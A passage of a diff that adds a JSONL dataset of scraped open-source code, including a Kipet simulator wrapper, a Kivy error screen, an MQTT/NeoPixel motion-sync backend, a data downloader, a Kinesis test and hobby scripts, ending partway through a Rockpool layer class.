diff --git "a/467.jsonl" "b/467.jsonl" new file mode 100644--- /dev/null +++ "b/467.jsonl" @@ -0,0 +1,2022 @@ +{"seq_id":"72196171283","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import print_function\nfrom pyomo.environ import *\nfrom pyomo.dae import *\nfrom kipet.library.ResultsObject import *\nfrom kipet.library.Simulator import *\nfrom kipet.library.PyomoSimulator import *\nfrom kipet.library.fe_factory import *\nimport warnings\nimport six\nimport sys\n\n__author__ = 'Michael Short' #: July 2018\n\nclass FESimulator(PyomoSimulator):\n def __init__(self, model):\n \"\"\"\n FESimulator class:\n \n This class is just an interface that allows the user of Kipet to easily implement the more general \n fe_factory class designed by David M. Thierry without having to re-write the model to fit those\n arguments. It takes in a standard Kipet/Pyomo model, rewrites it and calls fe_factory.\n More information on fe_factory is included in that class description.\n \n Args:\n model (ConcreteModel): The original Pyomo model created in the Kipet script\n \"\"\"\n super(FESimulator, self).__init__(model)\n self.p_sim = PyomoSimulator(model)\n self.c_sim = self.p_sim.model.clone()\n self.param_dict = {}\n self.param_name = \"P\"\n\n # check all parameters are fixed before simulating\n for p_sim_data in six.itervalues(self.p_sim.model.P):\n if not p_sim_data.fixed:\n raise RuntimeError('For simulation fix all parameters. Parameter {} is unfixed'.format(p_sim_data.cname()))\n\n #Build the parameter dictionary in the format that fe_factory uses \n for k,v in six.iteritems(self.p_sim.model.P):\n self.param_dict[\"P\",k] = v.value\n\n #Build the initial condition dictionary in the format that fe_factory uses\n self.ics_ = {} \n\n for t, k in six.iteritems(self.p_sim.model.Z):\n st = self.p_sim.model.start_time\n if t[0] == st:\n self.ics_['Z', t[1]] = k.value\n \n #Now to set the additional state values\n for t, v in six.iteritems(self.p_sim.model.X):\n if t[0] == st:\n self.ics_['X',t[1]] = v.value\n\n def call_fe_factory(self, inputs_sub=None, jump_states=None, jump_times=None, feed_times=None):#added for inclusion of discrete jumps CS\n \"\"\"\n call_fe_factory:\n \n This function applies all the inputs necessary for fe_factory to work, using Kipet syntax.\n Requires external inputs/dosing points to be specified with the following arguments.\n \n Args:\n inputs_sub (dict): dictionary of inputs \n jump_states (dict): dictionary of which variables and states are inputted and by how much\n jump_times (dict): dictionary in same form as jump_states with times of input\n feed_times (list): list of additional times needed, should be the same times as jump_times \n \"\"\"\n #added for inclusion of inputs of different kind CS\n self.inputs_sub=inputs_sub\n\n self.jump_times=jump_times\n self.jump_states=jump_states\n self.feed_times=feed_times\n \n init = fe_initialize(self.p_sim.model, self.c_sim,\n init_con=\"init_conditions_c\",\n param_name=self.param_name,\n param_values=self.param_dict,\n inputs_sub=self.inputs_sub)\n \n init.load_initial_conditions(init_cond=self.ics_)\n\n if jump_times!=None and jump_states!=None:\n init.load_discrete_jump(jump_states, jump_times, feed_times) #added for inclusion of discrete jumps\n init.run()\n","repo_name":"tkrumpol/KIPET","sub_path":"kipet/library/FESimulator.py","file_name":"FESimulator.py","file_ext":"py","file_size_in_byte":3707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} 
+{"seq_id":"71235640403","text":"from kivy.app import App\nfrom kivy.uix.screenmanager import ScreenManager, Screen\nimport kivy.uix.screenmanager\nfrom kivy.uix.button import Button\nfrom kivy.uix.boxlayout import BoxLayout\nfrom kivy.core.window import Window\n\n\nimport random\n\n#import string_sum\n\ndef run(error:str):\n if error == \"connection_error\":\n ErrorApp.run()\n\nclass ErrorApp(App):\n def build(self):\n sm = ScreenManager()\n\n sm.add_widget(ConnectionErrorScreen(name = \"screen\"))\n \n return sm\n\nclass ConnectionErrorScreen(Screen):\n def __init__(self, **kwargs):\n super(ConnectionErrorScreen, self).__init__(**kwargs)\n self.main_all_box = BoxLayout(orientation = \"vertical\")\n self.add_widget(self.main_all_box)\n\n self.banner = Button (border = (0, 0, 0, 0), size_hint = (1, None), height = Window.size[0] / 5.08, background_normal = 'images/banner.png', background_down = 'images/banner.png')\n self.main_all_box.add_widget(self.banner)\n\n text = \"\"\"\nConnection couldn't be found.\nTry these out:\n - Check your internet connection\n - Update your app\nIf these do not work, contact the developers.\n \"\"\"\n\n self.button = Button (border = (0, 0, 0, 0), size_hint = (1, 1), background_normal = 'images/paper_pink.png', background_down = 'images/paper_pink.png', text=text)\n self.main_all_box.add_widget(self.button)\n\n \n \n\nif __name__ == '__main__':\n ErrorApp().run()","repo_name":"Feluk6174/doxa_gui","sub_path":"error_screens.py","file_name":"error_screens.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12229695598","text":"# Simple test for NeoPixels on Raspberry Pi\n#from fusion import Fusion\nimport numpy as np\n#import utime as time\nimport time\nimport threading\nimport board\nimport neopixel\nimport paho.mqtt.client as mqtt\nfrom datetime import datetime\nfrom fastdtw import fastdtw\n# Choose an open pin connected to the Data In of the NeoPixel strip, i.e. board.D18\n# NeoPixels must be connected to D10, D12, D18 or D21 to work.\npixel_pin = board.D18\ndef time_diff(t2,t1):\n return t2-t1\n# The number of NeoPixels\nnum_pixels = 30\nnum_players = 3\n# The order of the pixel colors - RGB or GRB. 
Some NeoPixels have red and green reversed!\n# For RGBW NeoPixels, simply change the ORDER to RGBW or GRBW.\nORDER = neopixel.GRB\nMQTT_SERVER = \"localhost\"\n\npixels = neopixel.NeoPixel(pixel_pin, num_pixels, brightness=0.2, auto_write=False,\n pixel_order=ORDER)\nlookup_player_id = ['player{}'.format(i) for i in range(num_players)]\nred = threading.Event()\nwin_size = 5\neuler = np.zeros((num_players,win_size,3))\nid_window = 0\nt=[0]*num_players\n#sensors = [Fusion(time_diff) for i in range(num_players)]\nn_calibration = 200\nidx = 0\naccel_data = np.zeros((num_players,win_size,3))\ndiff_total_buffer = np.zeros((num_players,win_size))\ndiff_total_smooth = np.zeros((num_players,win_size))\nRED_THRESHOLD = 8\n\n\ndef wheel(pos):\n # Input a value 0 to 255 to get a color value.\n # The colours are a transition r - g - b - back to r.\n if pos < 0 or pos > 255:\n r = g = b = 0\n elif pos < 85:\n r = int(pos * 3)\n g = int(255 - pos*3)\n b = 0\n elif pos < 170:\n pos -= 85\n r = int(255 - pos*3)\n g = 0\n b = int(pos*3)\n else:\n pos -= 170\n r = 0\n g = int(pos*3)\n b = int(255 - pos*3)\n return (r, g, b) if ORDER == neopixel.RGB or ORDER == neopixel.GRB else (r, g, b, 0)\n\n\ndef rainbow_cycle(wait):\n for j in range(255):\n for i in range(num_pixels):\n pixel_index = (i * 256 // num_pixels) + j\n pixels[i] = wheel(pixel_index & 255)\n pixels.show()\n time.sleep(wait)\n\ndef set(r,g,b):\n for i in range(num_pixels):\n pixels[i] = (r,g,b)\n #times.sleep(wait)\t\n\n\ndef subscribe_to_topics(client): \n for i in range(num_players):\n client.subscribe(\"theguy/player{}\".format(i))\n print(\"Subscribed to theguy/player{}\".format(i))\n \n# The callback for when the client receives a CONNACK response from the server.\ndef on_connect(client, userdata, flags, rc):\n print(\"Connected with result code \"+str(rc))\n subscribe_to_topics(client)\n\n \n# The callback for when a PUBLISH message is received from the server.\n#offset = np.zeros((num_players,n_calibration,9))\n\ndef get_euler_0():\n return euler[0,idx]\n\n\ndef get_euler_1():\n return euler[1,idx]\n\ndef calibrating():\n return idx < 200\n\nget_euler = [\nget_euler_0,\nget_euler_1\n]\n\ndef on_message(client, userdata, msg):\n global win_size, euler, id_window, t, sensors, num_players, idx, diff_total_smooth\n ########print(msg.topic+\" \"+str(msg.payload))\n\n source = str(msg.topic).split('/')\n #######print(source)\n topic,id_player = source\n\n\n topic = str(topic)\n id_player = int(lookup_player_id.index(id_player))\n values = [float(n) for n in str(msg.payload)[2:-1].split(',')]\n\n ##########print('Topic: {}, Player: {}, Value: {}'.format(topic,id_player,values))\n\n ts = values[-1]\n #sensors[id_player].calibrate(get_euler[id_player],calibrating)\n# sensors[id_player].update(values[:3],values[3:6],values[6:9],ts)\n# sensors[id_player].update_nomag(values[:3]-offset[:3],values[3:6]-offset[3:6],ts)\n\n# for i in range(num_players):\n# euler[i,idx%win_size,0] = sensors[i].roll\n# euler[i,idx%win_size,1] = sensors[i].pitch\n# euler[i,idx%win_size,2] = sensors[i].heading\n# #euler[i,idx] -= offset[id_player]\n\n accel_data[id_player,idx%win_size] = values[:3]\n\n # carry forward the other players' previous samples so the window stays aligned\n if id_player == 0:\n accel_data[1,idx%win_size] = accel_data[1,(idx-1)%win_size]\n accel_data[2,idx%win_size] = accel_data[2,(idx-1)%win_size]\n elif id_player == 1:\n accel_data[0,idx%win_size] = accel_data[0,(idx-1)%win_size]\n accel_data[2,idx%win_size] = accel_data[2,(idx-1)%win_size]\n elif id_player == 2:\n accel_data[0,idx%win_size] = accel_data[0,(idx-1)%win_size]\n 
accel_data[1,idx%win_size] = accel_data[1,(idx-1)%win_size]\n #print(np.round(euler,2))\n\n\n\n ###########print(\"\\nPlayer 1: {0:.2f}|{1:.2f}|{2:.2f} Player 2: {3:.2f}|{4:.2f}|{5:.2f}\".format(\n # accel_data[0,idx%win_size,0],\n # accel_data[0,idx%win_size,1],\n # accel_data[0,idx%win_size,2],\n # accel_data[1,idx%win_size,0],\n # accel_data[1,idx%win_size,1],\n # accel_data[1,idx%win_size,2]))\n\n\n # distance between player 0 and player 1\n diff_total_p1_x = np.abs(accel_data[0,idx%win_size,0] - accel_data[1,idx%win_size,0])\n diff_total_p1_y = np.abs(accel_data[0,idx%win_size,1] - accel_data[1,idx%win_size,1])\n diff_total_p1_z = np.abs(accel_data[0,idx%win_size,2] - accel_data[1,idx%win_size,2])\n diff_total_p1 = np.sqrt(diff_total_p1_x ** 2 + diff_total_p1_y ** 2 + diff_total_p1_z ** 2)\n\n # same distance again, but between player 0 and player 2\n diff_total_p2_x = np.abs(accel_data[0,idx%win_size,0] - accel_data[2,idx%win_size,0])\n diff_total_p2_y = np.abs(accel_data[0,idx%win_size,1] - accel_data[2,idx%win_size,1])\n diff_total_p2_z = np.abs(accel_data[0,idx%win_size,2] - accel_data[2,idx%win_size,2])\n diff_total_p2 = np.sqrt(diff_total_p2_x ** 2 + diff_total_p2_y ** 2 + diff_total_p2_z ** 2)\n\n diff_total_buffer[0,idx] = 0\n diff_total_buffer[1,idx] = diff_total_p1\n diff_total_buffer[2,idx] = diff_total_p2\n\n diff_total_smooth[0,idx] = 0\n diff_total_smooth[1,idx] = np.mean(diff_total_buffer[1], 0)\n diff_total_smooth[2,idx] = np.mean(diff_total_buffer[2], 0)\n\n # print(\"x: {}, y: {}, z: {}, tot: {}, sm: {}\".format(diff_total_x, diff_total_y, diff_total_z, diff_total, diff_total_smooth))\n \n\n\n\n# diff_total = np.linalg.norm(euler[0]-euler[1])\n# diff_current = np.linalg.norm(euler[0,idx%win_size]-euler[1,idx%win_size])\n\n# dtw_diff,_ = fastdtw(euler[0],euler[1])\n idx = (idx + 1) % win_size\n\n# print('Eucl. Distance Current: {}'.format(diff_current))\n# print('Eucl. 
Distance Window: {}'.format(diff_total))\n\n# print('Time Warped Distance: {}'.format(dtw_diff))\n\n # idx was just advanced, so the newest smoothed sample sits at (idx - 1) % win_size\n if diff_total_smooth[1,(idx-1)%win_size] > RED_THRESHOLD or diff_total_smooth[2,(idx-1)%win_size] > RED_THRESHOLD:\n red.set()\n # print(\"Out of Sync\")\n else:\n # print(\"Clear\")\n red.clear()\n\n# with open('outfile.csv', 'a') as f:\n# f.write('{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{},{}\\n'.format(\n# sensors[0].ax,\n# sensors[0].ay,\n# sensors[0].az,\n# sensors[0].gx,\n# sensors[0].gy,\n# sensors[0].gz,\n# sensors[0].mx,\n# sensors[0].my,\n# sensors[0].mz,\n# sensors[0].roll,\n# sensors[0].pitch,\n# sensors[0].heading,\n# sensors[1].ax,\n# sensors[1].ay,\n# sensors[1].az,\n# sensors[1].gx,\n# sensors[1].gy,\n# sensors[1].gz,\n# sensors[1].mx,\n# sensors[1].my,\n# sensors[1].mz,\n# sensors[1].roll,\n# sensors[1].pitch,\n# sensors[1].heading,\n# ))\n\n\n\n\n\ndef main(): \n\n client = mqtt.Client()\n client.on_connect = on_connect\n client.on_message = on_message\n \n client.connect(MQTT_SERVER, 1883, 60)\n \n # Blocking call that processes network traffic, dispatches callbacks and\n # handles reconnecting.\n # Other loop*() functions are available that give a threaded interface and a\n # manual interface.\n j = 0\n while True:\n # COMM\n client.loop(.1)\n \n\n # LED\n j += 20\n if j > 140:\n j = 0\n\n # colour the strip by the worst (largest) smoothed difference across players\n gradient = diff_total_smooth.max() * 255 / RED_THRESHOLD\n if gradient > 255: gradient = 255\n set(int(gradient), int(255 - gradient), 0)\n pixels.show()\n\n # if not red.isSet():\n # for i in range(num_pixels):\n # pixel_index = (i * 256 // num_pixels) + j\n # pixels[i] = wheel(pixel_index & 255)\n # pixels.show()\n # else:\n # set(255,0,0)\n # pixels.show()\n\n\n\n\nmain()\n","repo_name":"phildue/theguy","sub_path":"theguy_backend.py","file_name":"theguy_backend.py","file_ext":"py","file_size_in_byte":8192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"37630472604","text":"import requests\nfrom pathlib import Path\nimport datetime as dt\nfrom urllib.request import urlretrieve\nimport os\n\ndef download_file(url, file_name, ddir):\n ddir.mkdir(parents=True, exist_ok=True)\n \n # Join the directory with the filename\n file_path = ddir / file_name\n \n # Send an HTTP request to the url of the file we want to access\n response = requests.get(os.path.join(url, file_name), stream=True)\n\n # Check if the request was successful\n if response.status_code == 200:\n # If the request was successful, download the file\n with open(file_path, 'wb') as file:\n for chunk in response.iter_content(chunk_size=1024):\n file.write(chunk)\n print(f\"Downloaded the file. HTTP Response Code: {response.status_code}\")\n # urlretrieve(url, file_path)\n else:\n print(f\"Failed to download the file. 
HTTP Response Code: {response.status_code}\")\n\n# The URL of the file we want to download\nurl = 'http://tendral.com/TOPSv2/latest_composite/'\n\n# Get the current date\nnow = dt.datetime.now()\n\n# Subtract one day from the current date to get yesterday's date\nyesterday = now - dt.timedelta(days=1)\ntomorrow = now + dt.timedelta(days=1)\n\n\nfor d in [yesterday, now, tomorrow]:\n # Format the date\n formatted_date_1 = yesterday.strftime('%Y%m%d')\n formatted_date_2 = d.strftime('%Y%m%d')\n\n # The name we want to give to the downloaded file\n file_name = f'tops_compositem_{formatted_date_1}_{formatted_date_2}.nc'\n\n # Directory where the file should be downloaded\n ddir = Path('/home/hurricaneadm/data/tops/')\n # ddir = Path('/Users/mikesmith/data/tops/')\n\n download_file(url, file_name, ddir / d.strftime('%Y/%m'))\n","repo_name":"rucool/ioos_model_comparisons","sub_path":"scripts/harvest/grab_tops.py","file_name":"grab_tops.py","file_ext":"py","file_size_in_byte":1711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71921252242","text":"# -*- coding: utf-8 -*-\n\"\"\"\n * Created by PyCharm.\n * Project: P1_Movie_Trailer\n * Author name: Iraquitan Cordeiro Filho\n * Author login: iraquitan\n * File: entertainment_center\n * Date: 10/14/15\n * Time: 11:14 PM\n * To change this template use File | Settings | File Templates.\n\"\"\"\nimport fresh_tomatoes_custom\nimport media\n\n\n# Create various Movie class instances\ntoy_story = media.Movie('Toy Story',\n \"A cowboy doll is profoundly threatened and jealous \"\n \"when a new spaceman figure supplants him as top toy \"\n \"in a boy's room.\",\n 1995,\n 'John Lasseter',\n 'https://upload.wikimedia.org/wikipedia/en/1/13/Toy_Story.jpg', # noqa\n 'https://www.youtube.com/watch?v=KYz2wyBy3kc')\n\navatar = media.Movie('Avatar',\n \"A paraplegic marine dispatched to the moon Pandora on a \"\n \"unique mission becomes torn between following his \"\n \"orders and protecting the world he feels is his home.\",\n 2009,\n 'James Cameron',\n 'https://upload.wikimedia.org/wikipedia/en/b/b0/Avatar-Teaser-Poster.jpg', # noqa\n 'https://www.youtube.com/watch?v=5PSNL1qE6VY')\n\nv_for_vendetta = media.Movie('V for Vendetta',\n \"Following world war, London is a police state \"\n \"occupied by a fascist government, and a \"\n \"vigilante known only as V (Hugo Weaving) uses \"\n \"terrorist tactics to fight the oppressors of \"\n \"the world in which he now lives.\",\n 2005,\n 'James McTeigue',\n 'https://upload.wikimedia.org/wikipedia/en/9/9f/Vforvendettamov.jpg', # noqa\n 'https://www.youtube.com/watch?v=lSA7mAHolAw')\n\nschool_of_rock = media.Movie('School of Rock',\n \"After being kicked out of a rock band, Dewey \"\n \"Finn becomes a substitute teacher of a strict \"\n \"elementary private school, only to try and turn \"\n \"it into a rock band.\",\n 2003,\n 'Richard Linklater',\n 'http://static.rogerebert.com/uploads/movie/movie_poster/school-of-rock-2003/large_cREN222Yw78zvSQ9bg17Y9QZS0c.jpg', # noqa\n 'https://www.youtube.com/watch?v=3PsUJFEBC74')\n\nhercules = media.Movie('Hercules',\n \"The son of the Greek Gods Zeus and Hera is stripped \"\n \"of his immortality as an infant and must become a \"\n \"true hero in order to reclaim it.\",\n 1995,\n 'Ron Clements and John Musker',\n 'https://31.media.tumblr.com/8fb4acba91d558615119d25c40789140/tumblr_inline_n571ften4m1rtf1yw.jpg', # noqa\n 'https://www.youtube.com/watch?v=NDMZHhcBHaQ')\n\ngarden_state = media.Movie('Garden State',\n \"A 
quietly troubled young man returns home for his \"\n \"mother's funeral after being estranged from his \"\n \"family for a decade.\",\n 2004,\n 'Zach Braff',\n 'http://www.masculinity-movies.com/wp-content/uploads/2012/04/600full-garden-state-poster.jpg', # noqa\n 'https://www.youtube.com/watch?v=u82n0e1mgmQ')\n\nhunger_games = media.Movie('Hunger Games',\n \"Katniss Everdeen voluntarily takes her younger \"\n \"sister's place in the Hunger Games, a televised \"\n \"fight to the death in which two teenagers from \"\n \"each of the twelve Districts of Panem are chosen \"\n \"at random to compete.\",\n 2012,\n 'Gary Ross',\n 'http://www.movieguide.org/wp-content/uploads/2012/06/98068201-0cc9-42ed-81ee-dcd480c4cba8.jpg', # noqa\n 'https://www.youtube.com/watch?v=PbA63a7H0bo')\n\nlotr_1 = media.Movie('LOTR 1 - The Fellowship of the Ring',\n \"A meek hobbit of the Shire and eight companions set out \"\n \"on a journey to Mount Doom to destroy the One Ring and \"\n \"the dark lord Sauron.\",\n 2001,\n 'Peter Jackson',\n 'http://www.movieposter.com/posters/archive/main/105/MPW-52979', # noqa\n 'https://www.youtube.com/watch?v=V75dMMIW2B4')\n\nlotr_2 = media.Movie('LOTR 2 - The Two Towers',\n \"While Frodo and Sam edge closer to Mordor with the help \"\n \"of the shifty Gollum, the divided fellowship makes a \"\n \"stand against Sauron's new ally, Saruman, and his \"\n \"hordes of Isengard.\",\n 2002,\n 'Peter Jackson',\n 'https://wtfbabe.files.wordpress.com/2012/11/two-towers-poster.jpg', # noqa\n 'https://www.youtube.com/watch?v=LbfMDwc4azU')\n\nlotr_3 = media.Movie('LOTR 3 - The Return of the King',\n \"Gandalf and Aragorn lead the World of Men against \"\n \"Sauron's army to draw his gaze from Frodo and Sam as \"\n \"they approach Mount Doom with the One Ring.\",\n 2003,\n 'Peter Jackson',\n 'http://sites.psu.edu/202d031/wp-content/uploads/sites/15365/2014/09/LOTR-King.jpg', # noqa\n 'https://www.youtube.com/watch?v=r5X-hFf6Bwo')\n\nmatrix = media.Movie('The Matrix',\n \"A computer hacker learns from mysterious rebels about \"\n \"the true nature of his reality and his role in the war \"\n \"against its controllers.\",\n 1999,\n 'The Wachowski Brothers',\n 'https://www.movieposter.com/posters/archive/main/9/A70-4902', # noqa\n 'https://www.youtube.com/watch?v=vKQi3bBA1y8')\n\nmovies = [toy_story, avatar, v_for_vendetta, school_of_rock, hercules,\n garden_state, hunger_games, lotr_1, lotr_2, lotr_3, matrix]\n\n# Use customized fresh_tomatoes_custom to create webpage with Movies instances\nfresh_tomatoes_custom.open_movies_page(movies)\n","repo_name":"iraquitan/udacity-fsnd-p0-movie-trailer","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70694657041","text":"#To check if any pokemon's number is a palindrome AND their base stat total is a palindrome. 
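A palindrome reads the same reversed, so the check below is simply str(x) == str(x)[::-1].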
\n#Thanks to hoopsandhiphop on youtube for the idea\n\nimport requests\nimport progressbar\n\ndef palindrome(x):\n\treturn str(x) == str(x)[::-1]\n\ndef numformat(num):\n\tif 0 < num < 10:\n\t\treturn '00{0}'.format(num)\n\telif 9 < num < 100:\n\t\treturn '0{0}'.format(num)\n\telse:\n\t\treturn str(num)\n\nbaseurl = 'https://www.serebii.net/pokedex-sm/'\n\noutlines = []\nfor pokenum in progressbar.progressbar(range(810)):\n\tif palindrome(pokenum):\n\t\turl = baseurl + '{0}.shtml'.format(numformat(pokenum))\n\t\tpage = requests.get(url)\n\t\tlinestocheck = []\n\t\tfor line in page.text.split('\\n'):\n\t\t\tif 'Base Stats - Total:' in line:\n\t\t\t\tif line not in linestocheck:\t\t\t\t\n\t\t\t\t\tlinestocheck.append(line)\n\t\t\t# the page title carries the name; [7:] strips the 7-char '<title>' prefix\n\t\t\tif '<title>' in line:\n\t\t\t\tname = line.split()[0][7:]\n\t\tusedbsts = []\n\t\tfor line in linestocheck:\n\t\t\tparsed = line.split()\n\t\t\tbst = parsed[-1][0:3]\n\t\t\tif bst not in usedbsts: \n\t\t\t\tusedbsts.append(bst)\n\t\t\t\tif palindrome(bst):\n\t\t\t\t\t\n\t\t\t\t\toutlines.append('{0} checks! Stats = {1}, number = {2}'.format(name, bst, pokenum))\nfor line in outlines:\n\tprint(line)\n","repo_name":"iammax/Fun-Projects","sub_path":"pokemon_palindrome.py","file_name":"pokemon_palindrome.py","file_ext":"py","file_size_in_byte":1117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"17445059521","text":"from machine import UART\nimport struct\nimport time\n\nuart = UART(1, 9600, tx=17, rx=16) # Initialize UART port.\n\ndef em_read():\n signed=True\n uart.write(b'\\xF8\\x04\\x00\\x00\\x00\\x0A\\x64\\x64') # Request for all parameters from the EM module.\n time.sleep(0.1)\n recv_data = uart.read()\n recv_data = recv_data[3:-2]\n data_length = int(len(recv_data) / 2)\n data_f = '>' + (('h' if signed else 'H') * data_length)\n return struct.unpack(data_f, recv_data)\n\ndef reset_energy(): # Resets 'kWh' data.\n uart.write(b'\\xF8\\x42\\xC2\\x41') \n","repo_name":"caijiayou/power","sub_path":"esp32/Lib/ssd1306.py","file_name":"ssd1306.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25450346120","text":"import helper\r\nimport pickle\r\n\r\ndef convert():\r\n raw_data = helper.read_data('./asset/test.txt')\r\n result = []\r\n file = open(\"result.txt\", \"w+b\")\r\n for i in raw_data:\r\n counter = 0\r\n for char in i:\r\n if char in '012':\r\n counter += 1\r\n if char == '1':\r\n result.append(counter)\r\n break\r\n pickle.dump(result,file)\r\n\r\ndef get_result():\r\n result = pickle.load(open(\"result.txt\", \"rb\"))\r\n return result\r\n\r\n\r\n\r\n","repo_name":"uygnef/COMP9318","sub_path":"my_solution/convert_test.py","file_name":"convert_test.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"18415711143","text":"import unittest\nfrom unittest.mock import patch\n\n# Import the functions under test\nfrom stream_consumer_upper import get_shard_iterator\n\n\nclass TestStreamConsumer(unittest.TestCase):\n\n @patch('stream_consumer_upper.kinesis_client')\n def test_get_shard_iterator(self, mock_kinesis_client):\n stream_name = 'bollinger_stream'\n shard_id = 'shardId-000000000000'\n expected_iterator = 'example_shard_iterator'\n\n mock_kinesis_client.get_shard_iterator.return_value = {\n 'ShardIterator': expected_iterator}\n result = get_shard_iterator(stream_name, shard_id)\n\n 
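# the function under test should return the mocked client's iterator unchanged\n 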
self.assertEqual(result, expected_iterator)\n mock_kinesis_client.get_shard_iterator.assert_called_once_with(\n StreamName=stream_name,\n ShardId=shard_id,\n ShardIteratorType='TRIM_HORIZON'\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jchaves1406/Kinesis_deployment","sub_path":"test_stream_consumer.py","file_name":"test_stream_consumer.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"40796384547","text":"\"\"\"\nLayer v1 base class for Rockpool layers\n\"\"\"\n\nfrom warnings import warn\nfrom abc import ABC, abstractmethod\nfrom functools import reduce\nfrom typing import Optional, Any, Tuple, Dict\nimport json\n\nimport numpy as np\n\nfrom rockpool.timeseries import TimeSeries, TSContinuous, TSEvent\nfrom rockpool.utilities.type_handling import to_scalar\n\n# - Configure exports\n__all__ = [\"Layer\"]\n\n\n# - Absolute tolerance, e.g. for comparing float values\ntol_abs = 1e-9\n\n\n### --- Implements the Layer abstract class\n\n\nclass Layer(ABC):\n \"\"\"\n Base class for Layers in rockpool\n\n This abstract class acts as a base class from which to derive subclasses that represent layers of neurons. As an abstract class, :py:class:`Layer` cannot be instantiated.\n \"\"\"\n\n def __init__(\n self,\n weights: np.ndarray,\n dt: float = 1.0,\n noise_std: float = 0.0,\n name: str = \"unnamed\",\n *args,\n **kwargs,\n ):\n \"\"\"\n Implement an abstract layer of neurons (no implementation, must be subclassed)\n\n :param ArrayLike[float] weights: Weight matrix for this layer. Indexed as [pre, post]\n :param float dt: Time-step used for evolving this layer. Default: 1\n :param float noise_std: Std. Dev. of state noise when evolving this layer. Default: 0. Defined as the expected std. dev. after 1s of integration time\n :param str name: Name of this layer. Default: 'unnamed'\n \"\"\"\n # - Call super-class init\n super().__init__(*args, **kwargs)\n\n # - Assign properties\n if name is None:\n self.name = \"unnamed\"\n else:\n self.name = name\n\n try:\n # Try this before enforcing with Numpy atleast to account for custom classes for weights\n self._size_in, self._size = weights.shape\n self._size_out = self._size\n self._weights = weights\n except Exception:\n weights = np.atleast_2d(weights)\n self._size_in, self._size = weights.shape\n self._size_out = self._size\n self._weights = weights\n\n # - Make sure `dt` is a float\n try:\n self._dt = float(dt)\n except TypeError:\n raise TypeError(self.start_print + \"`dt` must be a scalar.\")\n\n # Handle format of `noise_std`\n try:\n self.noise_std = float(noise_std)\n except TypeError:\n if noise_std is None:\n self.noise_std = 0.0\n else:\n raise TypeError(\n self.start_print + \"`noise_std` must be a scalar or `None`\"\n )\n\n self._timestep = 0\n\n ### --- Common methods\n\n def _determine_timesteps(\n self,\n ts_input: Optional[TimeSeries] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> int:\n \"\"\"\n Determine how many time steps to evolve with the given input\n\n :param Optional[TimeSeries] ts_input: TxM or Tx1 time series of input signals for this layer\n :param Optional[float] duration: Duration of the desired evolution, in seconds. If not provided, ``num_timesteps`` or the duration of ``ts_input`` will be used to determine evolution time\n :param Optional[int] num_timesteps: Number of evolution time steps, in units of :py:attr:`.dt`. 
If not provided, ``duration`` or the duration of ``ts_input`` will be used to determine evolution time\n\n :return int: num_timesteps: Number of evolution time steps\n \"\"\"\n\n if num_timesteps is None:\n # - Determine ``num_timesteps``\n if duration is None:\n # - Determine duration\n if ts_input is None:\n raise TypeError(\n self.start_print\n + \"One of `num_timesteps`, `ts_input` or `duration` must be supplied.\"\n )\n\n if ts_input.periodic:\n # - Use duration of periodic TimeSeries, if possible\n duration = ts_input.duration\n\n else:\n # - Evolve until the end of the input TimeSeries\n duration = ts_input.t_stop - self.t\n if duration <= 0:\n raise ValueError(\n self.start_print\n + \"Cannot determine an appropriate evolution duration.\"\n + \" `ts_input` finishes before the current evolution time.\",\n )\n num_timesteps = int(np.floor((duration + tol_abs) / self.dt))\n else:\n if not isinstance(num_timesteps, int):\n raise TypeError(\n self.start_print + \"`num_timesteps` must be a non-negative integer.\"\n )\n elif num_timesteps < 0:\n raise ValueError(\n self.start_print + \"`num_timesteps` must be a non-negative integer.\"\n )\n\n return num_timesteps\n\n def _prepare_input(\n self,\n ts_input: Optional[TimeSeries] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> Tuple[np.ndarray, np.ndarray, int]:\n \"\"\"\n Sample input, set up time base\n\n This function checks an input signal, and prepares a discretised time base according to the time step of the current layer\n\n :param Optional[TimeSeries] ts_input: :py:class:`.TimeSeries` of TxM or Tx1 Input signals for this layer\n :param Optional[float] duration: Duration of the desired evolution, in seconds. If not provided, then either ``num_timesteps`` or the duration of ``ts_input`` will define the evolution time\n :param Optional[int] num_timesteps: Integer number of evolution time steps, in units of ``.dt``. If not provided, then ``duration`` or the duration of ``ts_input`` will define the evolution time\n\n :return (ndarray, ndarray, int): (time_base, input_steps, num_timesteps)\n time_base: T1 Discretised time base for evolution\n input_raster (T1xN) Discretised input signal for layer\n num_timesteps: Actual number of evolution time steps, in units of ``.dt``\n \"\"\"\n assert (ts_input is None) or isinstance(\n ts_input, self.input_type\n ), \"The layer {} can only receive inputs of class {}\".format(\n self.name, str(self.input_type)\n )\n\n if self.input_type is TSContinuous:\n return self._prepare_input_continuous(ts_input, duration, num_timesteps)\n\n elif self.input_type is TSEvent:\n return self._prepare_input_events(ts_input, duration, num_timesteps)\n\n else:\n raise TypeError(\n \"Layer._prepare_input can only handle `TSContinuous` and `TSEvent` classes\"\n )\n\n def _prepare_input_continuous(\n self,\n ts_input: Optional[TSContinuous] = None,\n duration: Optional[float] = None,\n num_timesteps: Optional[int] = None,\n ) -> Tuple[np.ndarray, np.ndarray, int]:\n 